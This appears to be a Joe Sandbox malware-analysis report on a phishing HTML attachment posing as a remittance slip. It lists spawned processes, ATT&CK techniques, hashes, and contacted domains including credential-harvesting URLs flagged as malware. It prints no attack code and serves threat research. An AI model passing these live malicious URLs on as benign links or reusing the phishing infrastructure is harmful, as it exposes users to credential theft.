Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5232 --field-trial-handle=1916,i,2131574768349755672,8321632996138583652,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm

HTTP Parser: file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://pxvbtech.store/xtk/xls/x1t2k.js	100%	Avira URL Cloud	malware
file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	0%	Avira URL Cloud	safe
https://pxvbtech.store/xtk/xls/login.php	100%	Avira URL Cloud	malware
https://linxcoded.store/start/xls/includes/css6.css	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pxvbtech.store	63.250.38.198	true	false	high
s-part-0044.t-0009.fb-t-msedge.net	13.107.253.72	true	false	high
code.jquery.com	151.101.130.137	true	false	high
www.google.com	172.217.18.4	true	false	high
api.ipify.org	104.26.12.205	true	false	high
server1.linxcoded.store	185.174.100.76	true	false	unknown
linxcoded.store	162.0.229.203	true	false	high
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	high
ipv4.imgur.map.fastly.net	199.232.196.193	true	false	high
_8162._https.server1.linxcoded.store	unknown	unknown	false	unknown
i.imgur.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://linxcoded.store/start/xls/includes/css6.css	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/0HdPsKK.png	false		high
file:///C:/Users/user/Desktop/Remittance_Slip_kodiakbp.com.htm	true	Avira URL Cloud: safe	unknown
https://pxvbtech.store/xtk/xls/login.php	true	Avira URL Cloud: malware	unknown
https://i.imgur.com/KAb5SEy.png	false		high
https://pxvbtech.store/xtk/xls/x1t2k.js	true	Avira URL Cloud: malware	unknown
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://api.ipify.org/?format=json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_81.2.dr	false	high
https://getbootstrap.com)	chromecache_81.2.dr	false	high
https://api.ipify.org?format=json	chromecache_83.2.dr, chromecache_86.2.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
142.250.186.36	unknown	United States	15169	GOOGLEUS	false
172.217.18.4	www.google.com	United States	15169	GOOGLEUS	false
199.232.196.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
151.101.130.137	code.jquery.com	United States	54113	FASTLYUS	false
185.174.100.76	server1.linxcoded.store	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
151.101.2.137	unknown	United States	54113	FASTLYUS	false
63.250.38.198	pxvbtech.store	United States	22612	NAMECHEAP-NETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
162.0.229.203	linxcoded.store	Canada	22612	NAMECHEAP-NETUS	false

Private

IP
192.168.2.4
192.168.2.5
192.168.2.23

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1623886
Start date and time:	2025-02-25 17:11:37 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Remittance_Slip_kodiakbp.com.htm
Detection:	MAL
Classification:	mal96.phis.winHTM@26/26@24/13
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.18.99, 142.251.173.84, 142.250.185.78, 142.250.185.110, 142.250.186.174, 172.217.16.138, 142.250.184.206, 216.58.206.74, 199.232.214.172, 184.30.131.245, 142.250.181.234, 142.250.185.234, 172.217.23.106, 142.250.186.138, 142.250.184.234, 142.250.186.106, 142.250.186.170, 172.217.16.202, 216.58.212.170, 172.217.18.10, 142.250.186.74, 142.250.186.42, 216.58.206.42, 142.250.184.202, 142.250.185.238, 142.250.186.78, 216.58.212.142, 172.217.18.110, 216.58.206.78, 142.250.186.110, 172.217.18.3, 142.250.181.238, 216.58.206.46, 142.250.186.46, 23.199.214.10, 13.107.246.60, 13.107.253.72, 172.202.163.200
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	wEY98gM1Jj.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	DeepLauncher.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	[Huawei] Contract for YouTube partners.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	NexoPack Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	NexoPack Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	lO5lV39HDj.exe	Get hash	malicious	DarkTortilla, Quasar	Browse	api.ipify.org/
	SpacesVoid Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	55ryoipjfdr.exe	Get hash	malicious	Trickbot	Browse	api.ipify.org/
199.232.196.193	Play_VM-Now_offshorerenewablesVWAV.htm	Get hash	malicious	HTMLPhisher	Browse
	Final Contract.htm	Get hash	malicious	HTMLPhisher	Browse
	https://1drv.ms/w/c/ce0aa4089a0cf823/IQQ-p_-u_0bbTp7ALMPgaKOzAZ_aMu35BXGkFN3emxCDEwQ	Get hash	malicious	HTMLPhisher	Browse
	http://yesincs.com	Get hash	malicious	Unknown	Browse
	https://carrefouriramadan.pages.dev/kuwit	Get hash	malicious	Unknown	Browse
	http://newkrpromo.ru/	Get hash	malicious	HTMLPhisher, Telegram Phisher	Browse
	https://steamcommunttiy.com/activation=Tvc2Fh12mw1	Get hash	malicious	Unknown	Browse
	https://steamescommnunity.com/s/10429109537	Get hash	malicious	Unknown	Browse
	https://notifications.google.com/g/p/ANiao5rdjmKDR8JzehcAm6SkEomHyUC9FcOJcLaNAljVsTh_7y7GPHabSUxjarmclBuNUOroPWAEevR_J8SHFG4A0r7ZjB9DO_wG3FKCGK3dnoeR_KDPpklJRFBsEWgvb_vtwzfPefraHWyONYTBlbPANZelBDXqtgdr73yy_Xuk5rUXAgTZ8QJkulDNKBkK64JgvThc7IxOJ7UIaTA	Get hash	malicious	Unknown	Browse
	http://steamcommunity-cash.com/gift/id=572931441	Get hash	malicious	Unknown	Browse
151.101.130.137	http://mi-outlook-loggin.click/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://imaps-support.us/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://facebooksecurity.blogspot.ch/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29t	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://site9613885.92.webydo.com/?v=1	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.2.min.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pxvbtech.store	Play_VM-Now_offshorerenewablesVWAV.htm	Get hash	malicious	HTMLPhisher	Browse	63.250.38.198
pxvbtech.store	Play_VM-Now_menglandVWAV.htm	Get hash	malicious	Unknown	Browse	63.250.38.198
code.jquery.com	Goldsboro Housing Authority-encrypted.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	Ap.html	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.2.137
	http://ancient.anguish.org/cgi-bin/tms.cgi?https://xero-invoice.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.66.137
	https://atpscan.global.hornetsecurity.com/?d=eqOz7AXSzN2V2mi6iPmcWAtgYiZy7lkNff2rdLiYxLc&f=uieQKeFt6Zo7ANK8iLoZFPTujO3kkK4boT32m0sSAem2yjB3nbrJPC-bjAvICoGvUsBPae9KnS3shx7u3k2FiwwIqyiK3sQzLKFz5y8q_nj8PAt_J9HmT1bo5p4OIPC1eZYzpGJBfTb7UM-l94hwhA&i=&k=WFad&m=2x6lr8WIArfjoki1cLDoaGvtZnic1YOh--dHqhZnxNrDJUG4m82-vM5qXqDCSAsURkVh0fd5KOJuBllo3N6JKs2ra2-P7_2temJ9tYhs2hxglgVJVr5gYlT_yoYeRZjF&n=GP4DG9iGvMhGp7Cc0MfzdFVrVHv5htxygQbtVpxMJpUIBpkiFZSL5KiAfQBsE-KAVBPk5S1ARYk-3VQUbSVQ7A&r=WVGLAKs8L0Zh9eoU1fbnSHa5iJ0XuA-IG_TRldcDEATEV5Ai8mKQZHV2Y3yODQ5K&s=49438b7fe2a6d5a79aafcc5ab0730c0b326ba1d8858947a63aac81e1e9547b97&u=https%3A%2F%2Faws.predictiveresponse.net%2Ffwdhs.htm%3Fredirect%3D%2F%2FmembersGelita.cpmeduca.com.br	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.66.137
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	Invisible JS	Browse	151.101.2.137
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	Invisible JS	Browse	151.101.194.137
	https://p91v.gnoqwwhpwe.ru/3aeK/#Qhfraley@vhchealth.org	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.194.137
	33efecb7.htm	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	coop-himmelblau-EmployeePayoutFebruary 24, 2025.pdf	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.194.137
api.ipify.org	Unblock-SmbShareAccess.ps1	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://s3.us-east-2.amazonaws.com/tril-laxy-glou/UwyHSGw.html?EMAIL=hsneaba@hsn.net	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	BSDOC-2025.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Play_VM-Now_offshorerenewablesVWAV.htm	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	h5tjqdvOw8.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	AAMA.xlsx	Get hash	malicious	Gabagool	Browse	104.26.13.205
	https://1drv.ms/f/c/7e8c295f432cb874/Etstr3q-BCJJsWYCnC1MaZcBuM1vCXZ0QOJVViCpE5tBCg?e=8f6crW	Get hash	malicious	Gabagool	Browse	104.26.12.205
	EXTERNAL FW Complete Settlement Agreement Approved Monday February 24 2025.msg	Get hash	malicious	Gabagool, HTMLPhisher	Browse	172.67.74.152
	https://dl.dropboxusercontent.com/scl/fi/q6b8v43zm2qef4eevt1kv/itaou_ddos_client.zip?rlkey=1exycqq44csr7p13g7tvcjudm&st=eyla04ly&dl=0	Get hash	malicious	Unknown	Browse	104.26.12.205
	C-HAWK V075 PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
s-part-0044.t-0009.fb-t-msedge.net	Goldsboro Housing Authority-encrypted.pdf	Get hash	malicious	HTMLPhisher	Browse	13.107.253.72
	http://uamotyevd.giftrend.click/index.php?search=4&d155157&gjzla=302-2094&lm=1652441IFAP403&sd=9&page=WrLaWzz2HzKyHSp	Get hash	malicious	Phisher	Browse	13.107.253.72
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	13.107.253.72
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	Invisible JS	Browse	13.107.253.72
	phish_alert_sp2_2.0.0.0 - 2025-02-25T081956.882.eml	Get hash	malicious	Unknown	Browse	13.107.253.72
	27#U0646.bat	Get hash	malicious	AsyncRAT	Browse	13.107.253.72
	SWIFT 103 202502201417133440 200225.exe	Get hash	malicious	FormBook	Browse	13.107.253.72
	BC Indo - New Order 20253.docx	Get hash	malicious	Unknown	Browse	13.107.253.72
	http://tawk.to	Get hash	malicious	Unknown	Browse	13.107.253.72
	https://tampopo304-my.sharepoint.com/personal/t_peter_tampopo_co_uk/_layouts/15/guestaccess.aspx?share=ErD6Vn1_jHJCkzNA55SF53AB1bLxHPSyAiXwDO2SC9GB1Q&e=F2hCiy	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	13.107.253.72

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://lbhgcbtrk.giftrend.click/index.php?search=4&d154740&wcndf=302-5980&lm=274498GZOL251&sd=9&page=bz4MJnHq0VrSYgU	Get hash	malicious	Phisher	Browse	104.18.27.193
	Goldsboro Housing Authority-encrypted.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Ap.html	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	104.16.2.189
	QUOTATION_JANQUOTE312025.PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	104.21.96.1
	http://optiapps.xyz	Get hash	malicious	Unknown	Browse	104.21.96.1
	PRI_VTK250419A.exe	Get hash	malicious	Lokibot	Browse	104.21.80.1
	http://ancient.anguish.org/cgi-bin/tms.cgi?https://xero-invoice.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	172.67.167.95
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	104.16.2.189
	https://www.icco.org/statistics/	Get hash	malicious	Unknown	Browse	1.1.1.1
	Zitat Nr. 46789Feb25..exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
FASTLYUS	http://lbhgcbtrk.giftrend.click/index.php?search=4&d154740&wcndf=302-5980&lm=274498GZOL251&sd=9&page=bz4MJnHq0VrSYgU	Get hash	malicious	Phisher	Browse	151.101.129.44
	Goldsboro Housing Authority-encrypted.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.65.229
	Ap.html	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.2.137
	http://uamotyevd.giftrend.click/index.php?search=4&d155157&gjzla=302-2094&lm=1652441IFAP403&sd=9&page=WrLaWzz2HzKyHSp	Get hash	malicious	Phisher	Browse	151.101.194.217
	http://ancient.anguish.org/cgi-bin/tms.cgi?https://xero-invoice.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	151.101.2.79
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.194.137
	https://atpscan.global.hornetsecurity.com/?d=eqOz7AXSzN2V2mi6iPmcWAtgYiZy7lkNff2rdLiYxLc&f=uieQKeFt6Zo7ANK8iLoZFPTujO3kkK4boT32m0sSAem2yjB3nbrJPC-bjAvICoGvUsBPae9KnS3shx7u3k2FiwwIqyiK3sQzLKFz5y8q_nj8PAt_J9HmT1bo5p4OIPC1eZYzpGJBfTb7UM-l94hwhA&i=&k=WFad&m=2x6lr8WIArfjoki1cLDoaGvtZnic1YOh--dHqhZnxNrDJUG4m82-vM5qXqDCSAsURkVh0fd5KOJuBllo3N6JKs2ra2-P7_2temJ9tYhs2hxglgVJVr5gYlT_yoYeRZjF&n=GP4DG9iGvMhGp7Cc0MfzdFVrVHv5htxygQbtVpxMJpUIBpkiFZSL5KiAfQBsE-KAVBPk5S1ARYk-3VQUbSVQ7A&r=WVGLAKs8L0Zh9eoU1fbnSHa5iJ0XuA-IG_TRldcDEATEV5Ai8mKQZHV2Y3yODQ5K&s=49438b7fe2a6d5a79aafcc5ab0730c0b326ba1d8858947a63aac81e1e9547b97&u=https%3A%2F%2Faws.predictiveresponse.net%2Ffwdhs.htm%3Fredirect%3D%2F%2FmembersGelita.cpmeduca.com.br	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	185.199.110.133
	https://drive.usercontent.google.com/u/0/uc?id=1JmlOFU9xF5LP0XvS6hM5KS6X8cSifM5-&export=download	Get hash	malicious	Unknown	Browse	151.101.65.229
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	Invisible JS	Browse	151.101.2.137
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	Invisible JS	Browse	151.101.194.137
FASTLYUS	http://lbhgcbtrk.giftrend.click/index.php?search=4&d154740&wcndf=302-5980&lm=274498GZOL251&sd=9&page=bz4MJnHq0VrSYgU	Get hash	malicious	Phisher	Browse	151.101.129.44
	Goldsboro Housing Authority-encrypted.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.65.229
	Ap.html	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.2.137
	http://uamotyevd.giftrend.click/index.php?search=4&d155157&gjzla=302-2094&lm=1652441IFAP403&sd=9&page=WrLaWzz2HzKyHSp	Get hash	malicious	Phisher	Browse	151.101.194.217
	http://ancient.anguish.org/cgi-bin/tms.cgi?https://xero-invoice.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	151.101.2.79
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.194.137
	https://atpscan.global.hornetsecurity.com/?d=eqOz7AXSzN2V2mi6iPmcWAtgYiZy7lkNff2rdLiYxLc&f=uieQKeFt6Zo7ANK8iLoZFPTujO3kkK4boT32m0sSAem2yjB3nbrJPC-bjAvICoGvUsBPae9KnS3shx7u3k2FiwwIqyiK3sQzLKFz5y8q_nj8PAt_J9HmT1bo5p4OIPC1eZYzpGJBfTb7UM-l94hwhA&i=&k=WFad&m=2x6lr8WIArfjoki1cLDoaGvtZnic1YOh--dHqhZnxNrDJUG4m82-vM5qXqDCSAsURkVh0fd5KOJuBllo3N6JKs2ra2-P7_2temJ9tYhs2hxglgVJVr5gYlT_yoYeRZjF&n=GP4DG9iGvMhGp7Cc0MfzdFVrVHv5htxygQbtVpxMJpUIBpkiFZSL5KiAfQBsE-KAVBPk5S1ARYk-3VQUbSVQ7A&r=WVGLAKs8L0Zh9eoU1fbnSHa5iJ0XuA-IG_TRldcDEATEV5Ai8mKQZHV2Y3yODQ5K&s=49438b7fe2a6d5a79aafcc5ab0730c0b326ba1d8858947a63aac81e1e9547b97&u=https%3A%2F%2Faws.predictiveresponse.net%2Ffwdhs.htm%3Fredirect%3D%2F%2FmembersGelita.cpmeduca.com.br	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	185.199.110.133
	https://drive.usercontent.google.com/u/0/uc?id=1JmlOFU9xF5LP0XvS6hM5KS6X8cSifM5-&export=download	Get hash	malicious	Unknown	Browse	151.101.65.229
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	Invisible JS	Browse	151.101.2.137
	https://login.case.edu/cas/login?gateway=true&service=https%3A%2F%2Fassets-usa.mkt.dynamics.com/073116b7-d9ed-ef11-933d-6045bd027c35/digitalassets/standaloneforms/f762be82-c9f2-ef11-9342-000d3a59dfbe	Get hash	malicious	Invisible JS	Browse	151.101.194.137
ASN-QUADRANET-GLOBALUS	https://mylarbagdesigns.com/	Get hash	malicious	HTMLPhisher	Browse	66.63.187.37
	Play_VM-Now_offshorerenewablesVWAV.htm	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
	res.x86.elf	Get hash	malicious	Unknown	Browse	146.71.41.225
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	66.154.121.109
	http://111.sharpsites%5B.%5Dorg%5B.%5Duk/?png=LE0@@QDh/HxZFLz9MQGg6T0YmQTxJZEA/&x=/nKXdh/%23YWtuYXBwQHBhcmtlci5jb20=%22%3C/script	Get hash	malicious	Unknown	Browse	45.61.161.8
	http://111.sharpsites.org.uk/?png=LE0@@QDh/HxZFLz9MQGg6T0YmQTxJZEA/&x=/nKXdh/%23YWtuYXBwQHBhcmtlci5jb20=%22%3C/script	Get hash	malicious	HTMLPhisher	Browse	45.61.161.8
	HDFC PAYMENT.bat	Get hash	malicious	Unknown	Browse	147.78.241.56
	SecuriteInfo.com.Win32.MalwareX-gen.30885.10239.exe	Get hash	malicious	Remcos	Browse	45.61.166.182
	Comprobante transferencia 5678373888272653688262553.exe	Get hash	malicious	DarkCloud	Browse	204.44.192.90
	play.wav.htm	Get hash	malicious	HtmlDropper	Browse	185.174.100.76

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

File type:	HTML document, ASCII text, with very long lines (64783)
Entropy (8bit):	5.792854317116284
TrID:	HyperText Markup Language (15015/1) 30.02% HyperText Markup Language (12001/1) 23.99% HyperText Markup Language (12001/1) 23.99% HyperText Markup Language (11001/1) 21.99%
File name:	Remittance_Slip_kodiakbp.com.htm
File size:	113'763 bytes
MD5:	1d067101a0eb8ccb96419f870ca143df
SHA1:	372ce919e5eedb1244aeeb160a7015dff081d664
SHA256:	c67e7e175dbc8459ca60579a637505a806b4ae5474056471f26317381d24485a
SHA512:	442e2e60b2ff779cd7ccb10f6630bf3a15a074eb321f1000d50aacd1d88660735a8e2f0f1a3be5c1655158886c0b2c4af5187ae6020f0711fa67790f716bcd2c
SSDEEP:	3072:1goEtBiEKeiZXEODmMdLjVteXcG1Ew0P8LifcP2yVR:1goSixHXnVlVtucYEHPgz2yVR
